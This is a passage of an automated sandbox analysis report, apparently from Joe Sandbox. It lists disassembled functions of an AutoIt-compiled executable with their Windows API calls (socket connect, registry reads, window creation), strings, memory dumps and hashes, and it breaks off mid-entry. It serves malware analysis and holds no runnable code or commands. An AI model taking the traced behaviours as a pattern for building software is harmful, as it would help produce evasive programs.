                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                              • API String ID: 0-572801152
                                                                                                                                                                              • Opcode ID: 4b815d943e48c9147b39ffbb6ed913891116b79079b69fc8208917a0c0e6d469
                                                                                                                                                                              • Instruction ID: 28548877abbd76286d0968fbf20f673c2c0e1541b65aa61e0ff5104cbc452de9
                                                                                                                                                                              • Opcode Fuzzy Hash: 4b815d943e48c9147b39ffbb6ed913891116b79079b69fc8208917a0c0e6d469
                                                                                                                                                                              • Instruction Fuzzy Hash: A3E1CE71A00219ABDF10DFA8C881BAE7FB5BF49314F14862DF955AB2C1D774AD41CBA0
                                                                                                                                                                              Function 0050BF80 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Variant$ClearInit$_memset
                                                                                                                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                              • API String ID: 2862541840-625585964
                                                                                                                                                                              • Opcode ID: 7ca989cfa0bbc31c2873864eb9cf548f3f80c92010b5acc36eab04a578e3fcb6
                                                                                                                                                                              • Instruction ID: 2d3c4d7b17446d90fceaf77e4544410882700adab83c5b746fcf58785cb8522d
                                                                                                                                                                              • Opcode Fuzzy Hash: 7ca989cfa0bbc31c2873864eb9cf548f3f80c92010b5acc36eab04a578e3fcb6
                                                                                                                                                                              • Instruction Fuzzy Hash: 07919F71A00219ABDF24CFA5D848FAEBFB8FF46714F108619F915AB281D7709945CFA0
                                                                                                                                                                              Function 0050936F Relevance: 10.6, APIs: 7, Instructions: 136networkCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • select.WS2_32(00000000,00000001,00000000,00000000,?,000003E8,0054DBF0), ref: 00509409
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00509416
                                                                                                                                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 0050943A
                                                                                                                                                                              • #16.WSOCK32(?,?,00000000,00000000), ref: 00509452
                                                                                                                                                                              • _strlen.LIBCMT ref: 00509484
                                                                                                                                                                              • _memmove.LIBCMT ref: 005094CA
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 005094F7
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2795762555-0
                                                                                                                                                                              • Opcode ID: af903e91618f6d78a3e2043f98673567dcb737c891327cf1c8b382454ed00c30
                                                                                                                                                                              • Instruction ID: fbf90154d12eedcd990d4b7608ed1a090781aa1ae6fed43b5e471f0803425d0d
                                                                                                                                                                              • Opcode Fuzzy Hash: af903e91618f6d78a3e2043f98673567dcb737c891327cf1c8b382454ed00c30
                                                                                                                                                                              • Instruction Fuzzy Hash: C441AE75500208AFCB04EB65CC85EEEBBB9FF48314F10816AF516972D2DB34AE05CB60
                                                                                                                                                                              Function 004CEB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,004CEADA,?,?), ref: 004CEB27
                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,004CEADA,?,?), ref: 00524B26
                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,004CEADA,?,?), ref: 00524B65
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,004CEADA,?,?), ref: 00524B94
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: QueryValue$CloseOpen
                                                                                                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                                                              • API String ID: 1586453840-614718249
                                                                                                                                                                              • Opcode ID: 50a385213b741594d13efcd7a6d59db301840ff139f6e1003e7b61f8956a6e2e
                                                                                                                                                                              • Instruction ID: 8b9ab2b3bd5058fdcdece07f59c9dea5b49bbf76514ea8e88d0d86418c00e9fb
                                                                                                                                                                              • Opcode Fuzzy Hash: 50a385213b741594d13efcd7a6d59db301840ff139f6e1003e7b61f8956a6e2e
                                                                                                                                                                              • Instruction Fuzzy Hash: 85114C71600118BEEB04DBA4DD8AEFE7BBCEF04758F10005AF506E6191EA70AE05EB64
                                                                                                                                                                              Function 004B2E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004B2ECB
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004B2EEC
                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004B2F00
                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004B2F09
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$CreateShow
                                                                                                                                                                              • String ID: AutoIt v3$edit
                                                                                                                                                                              • API String ID: 1584632944-3779509399
                                                                                                                                                                              • Opcode ID: 690b7cd8561ebf0db84caecbba5776065c0dec21c8e5abf1711fbddf4147d1f3
                                                                                                                                                                              • Instruction ID: 65594ccbcf78364c212333c8bd16966341ffd63cb05eddffef7f75abd1f56908
                                                                                                                                                                              • Opcode Fuzzy Hash: 690b7cd8561ebf0db84caecbba5776065c0dec21c8e5abf1711fbddf4147d1f3
                                                                                                                                                                              • Instruction Fuzzy Hash: 0CF030715406D07BD730676B7C0DE672E7DE7D6F10B01401EBA0892260C16108DDFA78
                                                                                                                                                                              Function 004B3DCB Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 258COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B3F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004B34E2,?,00000001), ref: 004B3FCD
                                                                                                                                                                              • _free.LIBCMT ref: 00523C27
                                                                                                                                                                              • _free.LIBCMT ref: 00523C6E
                                                                                                                                                                                • Part of subcall function 004BBDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,005722E8,?,00000000,?,004B3E2E,?,00000000,?,0054DBF0,00000000,?), ref: 004BBE8B
                                                                                                                                                                                • Part of subcall function 004BBDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,004B3E2E,?,00000000,?,0054DBF0,00000000,?,00000002), ref: 004BBEA7
                                                                                                                                                                                • Part of subcall function 004BBDF0: __wsplitpath.LIBCMT ref: 004BBF19
                                                                                                                                                                                • Part of subcall function 004BBDF0: _wcscpy.LIBCMT ref: 004BBF31
                                                                                                                                                                                • Part of subcall function 004BBDF0: _wcscat.LIBCMT ref: 004BBF46
                                                                                                                                                                                • Part of subcall function 004BBDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 004BBF56
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<K
                                                                                                                                                                              • API String ID: 1510338132-1946222467
                                                                                                                                                                              • Opcode ID: bdda2d462d2e2a815a3abbf945f1f6f5e95e5cf4f47502d89e807014fb25d867
                                                                                                                                                                              • Instruction ID: d2686bafdee55e7188707ecc92c7b46ba45e59163185f7c322b019cabefcc3d7
                                                                                                                                                                              • Opcode Fuzzy Hash: bdda2d462d2e2a815a3abbf945f1f6f5e95e5cf4f47502d89e807014fb25d867
                                                                                                                                                                              • Instruction Fuzzy Hash: A3917F71910229AFCF04EFA5DC919EEBBB4FF09314F14442EF416AB291DB789A05CB64
                                                                                                                                                                              Function 004F6D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B3B1E: _wcsncpy.LIBCMT ref: 004B3B32
                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 004F6DBA
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004F6DC5
                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 004F6DD9
                                                                                                                                                                              • _wcsrchr.LIBCMT ref: 004F6DFB
                                                                                                                                                                                • Part of subcall function 004F6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 004F6E31
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3633006590-0
                                                                                                                                                                              • Opcode ID: c18449f0d3885fd277f5079afae8991108ee2b706376fa4dec390c5989775143
                                                                                                                                                                              • Instruction ID: 747b08839da49f771d1f47035b043c7f4d8dcd5bee30761be3276dc8c1eca79e
                                                                                                                                                                              • Opcode Fuzzy Hash: c18449f0d3885fd277f5079afae8991108ee2b706376fa4dec390c5989775143
                                                                                                                                                                              • Instruction Fuzzy Hash: 1121D86960531C96DB106775EC5AAFB336CDF11310F21055BE621C32D2EB28CD84966D
                                                                                                                                                                              Function 00509122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 0050ACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0050ACF5
                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00509160
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0050916F
                                                                                                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 0050918B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3701255441-0
                                                                                                                                                                              • Opcode ID: 6c714c7fa761042bc534f3883846e9dd2c1b5ec8583c18d2ab1c48b2abf87b34
                                                                                                                                                                              • Instruction ID: 8e544329d6002e1df66601336b7fe9606a518ad35fab4d1356e39af2fb143a84
                                                                                                                                                                              • Opcode Fuzzy Hash: 6c714c7fa761042bc534f3883846e9dd2c1b5ec8583c18d2ab1c48b2abf87b34
                                                                                                                                                                              • Instruction Fuzzy Hash: FD2181353002119FDB00AF69DC89B6E77B9EF84724F04441DF9169B3D2DA74AC05D761
                                                                                                                                                                              Function 0050F79F Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 385COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: dEV
                                                                                                                                                                              • API String ID: 0-3214538095
                                                                                                                                                                              • Opcode ID: 6bc89c68872a3e0a90b7457c6a821146edbb706972223294082b3d8ac27ec938
                                                                                                                                                                              • Instruction ID: 5ebbed624243d763ebd0dc42492f266a65792927744d822573edd6655716f44f
                                                                                                                                                                              • Opcode Fuzzy Hash: 6bc89c68872a3e0a90b7457c6a821146edbb706972223294082b3d8ac27ec938
                                                                                                                                                                              • Instruction Fuzzy Hash: B1F17A716083019FD720DF24C985B5EBBE5FF88314F14892EF9998B292D774E945CB82
                                                                                                                                                                              Function 004B3A67 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SHGetMalloc.SHELL32(1<K), ref: 004B3A7D
                                                                                                                                                                              • SHGetPathFromIDListW.SHELL32(?,?), ref: 004B3AD2
                                                                                                                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 004B3A8F
                                                                                                                                                                                • Part of subcall function 004B3B1E: _wcsncpy.LIBCMT ref: 004B3B32
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                                                                              • String ID: 1<K
                                                                                                                                                                              • API String ID: 3981382179-1209382738
                                                                                                                                                                              • Opcode ID: 23ca5b2428c4a13f6c40432c37653c37463e81409bf642f5d34f830c9e76d3ce
                                                                                                                                                                              • Instruction ID: 5f8de176e659bb12bbc1c2185ec26dc1cc51a1932b5c9bf298b0dea110f5039b
                                                                                                                                                                              • Opcode Fuzzy Hash: 23ca5b2428c4a13f6c40432c37653c37463e81409bf642f5d34f830c9e76d3ce
                                                                                                                                                                              • Instruction Fuzzy Hash: FA21AF32B00114ABCB10DF96DC84DEEBBBDEF88701B104099F509DB245DB70AE46CBA4
                                                                                                                                                                              Function 004CC955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004CC948,SwapMouseButtons,00000004,?), ref: 004CC979
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004CC948,SwapMouseButtons,00000004,?,?,?,?,004CBF22), ref: 004CC99A
                                                                                                                                                                              • RegCloseKey.KERNEL32(00000000,?,?,004CC948,SwapMouseButtons,00000004,?,?,?,?,004CBF22), ref: 004CC9BC
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                              • String ID: Control Panel\Mouse
                                                                                                                                                                              • API String ID: 3677997916-824357125
                                                                                                                                                                              • Opcode ID: 6bfff319a6176129b6c33ce23709c825cd6a54dc57dea133cb3c740e17c445d5
                                                                                                                                                                              • Instruction ID: e7bea402613a1a70af3018bb16fa1e1442938389c9841114ee7ef32e9254c565
                                                                                                                                                                              • Opcode Fuzzy Hash: 6bfff319a6176129b6c33ce23709c825cd6a54dc57dea133cb3c740e17c445d5
                                                                                                                                                                              • Instruction Fuzzy Hash: 29117CB9511208BFDB608F64DC84EAF7BB8EF14740F00441AE849E7210E231AE55AB64
                                                                                                                                                                              Function 004EA8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 1a16f05a4aa0b92090575b49b94c4774475c6d084cf5670643f60fec91373a86
                                                                                                                                                                              • Instruction ID: 495c99ba5fcb5b9d94ef0d9928b9794def037eab0a9cab807f96e3db150e5d00
                                                                                                                                                                              • Opcode Fuzzy Hash: 1a16f05a4aa0b92090575b49b94c4774475c6d084cf5670643f60fec91373a86
                                                                                                                                                                              • Instruction Fuzzy Hash: 18C1AD74A0025AEFCB14CFA5C884EAEB7B5FF48305F10859AE901AB251D734FE51CBA5
                                                                                                                                                                              Function 004FCC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B41A7: _fseek.LIBCMT ref: 004B41BF
                                                                                                                                                                                • Part of subcall function 004FCE59: _wcscmp.LIBCMT ref: 004FCF49
                                                                                                                                                                                • Part of subcall function 004FCE59: _wcscmp.LIBCMT ref: 004FCF5C
                                                                                                                                                                              • _free.LIBCMT ref: 004FCDC9
                                                                                                                                                                              • _free.LIBCMT ref: 004FCDD0
                                                                                                                                                                              • _free.LIBCMT ref: 004FCE3B
                                                                                                                                                                                • Part of subcall function 004D28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,004D8715,00000000,004D88A3,004D4673,?), ref: 004D28DE
                                                                                                                                                                                • Part of subcall function 004D28CA: GetLastError.KERNEL32(00000000,?,004D8715,00000000,004D88A3,004D4673,?), ref: 004D28F0
                                                                                                                                                                              • _free.LIBCMT ref: 004FCE43
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1552873950-0
                                                                                                                                                                              • Opcode ID: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                                                                              • Instruction ID: 971ae27551b3dfc7e4a5d2498cc81af2b207a50636aeafa6adef215754b6725b
                                                                                                                                                                              • Opcode Fuzzy Hash: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                                                                              • Instruction Fuzzy Hash: EF514CB1D0421CAFDF149F69CC81AAEBBB9EF48304F1044AFF619A3251D7755A808F69
                                                                                                                                                                              Function 004B1E58 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 004B1E87
                                                                                                                                                                                • Part of subcall function 004B38E4: _memset.LIBCMT ref: 004B3965
                                                                                                                                                                                • Part of subcall function 004B38E4: _wcscpy.LIBCMT ref: 004B39B5
                                                                                                                                                                                • Part of subcall function 004B38E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 004B39C6
                                                                                                                                                                              • KillTimer.USER32(?,00000001), ref: 004B1EDC
                                                                                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004B1EEB
                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00524526
                                                                                                                                                                              Memory Dump Source
